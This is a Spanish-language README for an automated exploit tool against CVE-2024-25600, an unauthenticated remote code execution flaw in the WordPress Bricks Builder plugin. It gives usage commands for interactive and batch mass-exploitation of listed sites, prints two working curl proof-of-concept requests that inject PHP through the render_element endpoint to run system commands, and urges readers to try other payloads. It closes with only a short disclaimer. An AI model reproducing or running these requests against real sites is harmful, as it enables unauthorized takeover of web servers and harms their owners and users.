
Herramienta de explotación automatizada para CVE-2024-25600, que permite la ejecución remota de código no autenticada en sitios WordPress que utilizan el plugin Bricks Builder. Soporta modos interactivo y por lotes para la ejecución de comandos.
Esta herramienta 🛠️ está diseñada para explotar la vulnerabilidad CVE-2024-25600 🕳️ encontrada en el plugin Bricks Builder para WordPress. La vulnerabilidad permite la ejecución remota de código no autenticado en sitios web afectados 💻. La herramienta automatiza el proceso de explotación obteniendo nonces y enviando solicitudes especialmente diseñadas para ejecutar comandos arbitrarios.
git clone.pip install -r requirements.txt.python exploit.py -u <URL> para iniciar el modo interactivo.python exploit.py -l <ruta_del_archivo> para escanear y explotar los sitios listados.La PoC base proporcionada por la divulgación es la siguiente:
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "container",
"settings": {
"hasLoop": "true",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Actualización: Segunda PoC (más confiable)
curl -k -X POST https://[HOST]/wp-json/bricks/v1/render_element \
-H "Content-Type: application/json" \
-d '{
"postId": "1",
"nonce": "[NONCE]",
"element": {
"name": "carousel",
"settings": {
"type": "posts",
"query": {
"useQueryEditor": true,
"queryEditor": "throw new Exception(`id`);",
"objectType": "post"
}
}
}
}'
Es posible que cargas útiles adicionales puedan dar mejores resultados. Si mi exploit o prueba de concepto no funciona para ti, te animo a experimentar con cargas útiles alternativas para encontrar una solución más efectiva.
Reemplaza [HOST] con el sitio web objetivo y [NONCE] con el valor del nonce obtenido del sitio.
Para más información sobre la vulnerabilidad CVE-2024-25600, consulta la divulgación detallada en Snicco.io.
La información proporcionada en este README es solo con fines educativos. El acceso no autorizado a sitios web o redes es ilegal y poco ético. 🚫
Reconocimiento a los investigadores de seguridad que descubrieron y reportaron esta vulnerabilidad, proporcionando a la comunidad información y herramientas para ayudar a asegurar sus aplicaciones web.